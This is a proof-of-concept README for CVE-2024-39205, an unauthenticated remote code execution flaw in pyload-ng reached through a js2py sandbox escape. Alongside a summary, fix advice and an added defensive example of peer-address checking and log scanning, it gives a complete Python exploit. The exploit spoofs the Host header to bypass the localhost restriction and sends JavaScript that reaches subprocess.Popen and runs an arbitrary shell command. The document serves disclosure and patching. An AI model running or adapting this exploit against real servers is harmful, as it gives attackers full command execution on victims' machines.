PoC details: ab620f8d6608ab97c2e9b12a8c05a2eb3a3f4cfc

Source
Related vulnerability
Title: pyLoad security vulnerability (CVE-2024-39205)
Description: pyLoad is a free, open-source download manager written in Python, published by the pyLoad project. pyLoad 0.5.0b3.dev85 and earlier contain a security vulnerability that allows an attacker to execute arbitrary code via a crafted HTTP request.
Description
Pyload RCE with js2py sandbox escape
Introduction
# CVE-2024-39205-Pyload-RCE
Pyload RCE with js2py sandbox escape 

## Summary
Any pyload-ng instance running under Python 3.11 or below is vulnerable to RCE. An attacker can send a request containing an arbitrary shell command, and the victim server will execute it immediately.

## Fix
Upgrade to the newest version of pyload-ng, or run pyload under Python 3.12 or above.

## Details
js2py has a sandbox-escape vulnerability, [CVE-2024-28397](https://github.com/Marven11/CVE-2024-28397-js2py-Sandbox-Escape), and js2py is what the `/flash/addcrypted2` API endpoint of pyload-ng uses to evaluate the submitted script. Although this endpoint is designed to accept only localhost connections, that restriction can be bypassed with an HTTP header, which gives access to the API and leads to RCE.
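The bypass above works because a localhost-only check that consults the HTTP Host header is checking a value the client chooses. The following is an added example, not pyLoad's own code: a Host-header-based check of the assumed form beside a check on the socket peer address, plus a scan of constructed access-log lines (format assumed) that flags requests to `/flash/addcrypted2` arriving from non-loopback peers.

```python
import ipaddress
from dataclasses import dataclass

# Endpoints that must be reachable only from the local machine.
LOCAL_ONLY_PATHS = {"/flash/addcrypted2"}

@dataclass
class Request:
    peer_ip: str      # TCP peer address from the socket; the client cannot choose it
    host_header: str  # HTTP Host header; the client chooses it freely
    path: str

def host_header_says_local(req: Request) -> bool:
    # Weak check (assumed form): the PoC above sends Host: 127.0.0.1:9666 from anywhere.
    hostname = req.host_header.rsplit(":", 1)[0].strip("[]").lower()
    return hostname in ("localhost", "127.0.0.1", "::1")

def peer_is_loopback(req: Request) -> bool:
    # Correct check: only the transport-level peer address is beyond the client's control.
    try:
        addr = ipaddress.ip_address(req.peer_ip)
    except ValueError:
        return False
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped:
        addr = addr.ipv4_mapped  # dual-stack sockets report ::ffff:127.0.0.1
    return addr.is_loopback

def allowed_weak(req: Request) -> bool:
    return req.path not in LOCAL_ONLY_PATHS or host_header_says_local(req)

def allowed_fixed(req: Request) -> bool:
    return req.path not in LOCAL_ONLY_PATHS or peer_is_loopback(req)

# Constructed access-log sample, one request per line: "<peer_ip> <method> <path> <Host header>".
SAMPLE_LOG = """\
10.0.0.7 POST /flash/addcrypted2 127.0.0.1:9666
127.0.0.1 POST /flash/addcrypted2 127.0.0.1:9666
10.0.0.7 GET /login 10.0.0.5:9666
"""

def suspicious_lines(log: str) -> list[str]:
    # Flag hits on local-only paths from non-loopback peers, whatever the Host header says.
    flagged = []
    for line in log.splitlines():
        peer, _method, path, host = line.split()
        if not allowed_fixed(Request(peer, host, path)):
            flagged.append(line)
    return flagged
```

Behind a reverse proxy the peer address is the proxy's, so the endpoint must then be blocked at the proxy instead.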
 
## PoC
The PoC is provided below; you can modify the shell command it executes:

```python
import socket
import base64
from urllib.parse import quote

host, port = input("host: "), int(input("port: "))

payload = """
// [+] command goes here:
let cmd = "head -n 1 /etc/passwd; calc; gnome-calculator;"
let hacked, bymarve, n11
let getattr, obj

hacked = Object.getOwnPropertyNames({})
bymarve = hacked.__getattribute__
n11 = bymarve("__getattribute__")
obj = n11("__class__").__base__
getattr = obj.__getattribute__

function findpopen(o) {
    let result;
    for(let i in o.__subclasses__()) {
        let item = o.__subclasses__()[i]
        if(item.__module__ == "subprocess" && item.__name__ == "Popen") {
            return item
        }
        if(item.__name__ != "type" && (result = findpopen(item))) {
            return result
        }
    }
}

n11 = findpopen(obj)(cmd, -1, null, -1, -1, -1, null, null, true).communicate()
console.log(n11)
function f() {
    return n11
}

"""

crypted_b64 = base64.b64encode(b"1234").decode()

data = f"package=pkg&crypted={quote(crypted_b64)}&jk={quote(payload)}"

request = f"""\
POST /flash/addcrypted2 HTTP/1.1
Host: 127.0.0.1:9666
Content-Type: application/x-www-form-urlencoded
Content-Length: {len(data)}

{data}
""".encode().replace(b"\n", b"\r\n")

def main():

    s = socket.socket()
    s.connect((host, port))

    s.send(request)
    response = s.recv(1024).decode()
    print(response)

if __name__ == "__main__":
    main()
```

## Impact
Anyone who runs the latest version (<=0.5.0b3.dev85) of pyload-ng under Python 3.11 or below is affected. pyload-ng does not use js2py on Python 3.12 or above.

## Links
https://github.com/pyload/pyload/security/advisories/GHSA-w7hq-f2pj-c53g
File snapshot

[4.0K] /data/pocs/ab620f8d6608ab97c2e9b12a8c05a2eb3a3f4cfc └── [2.4K] README.md 0 directories, 1 file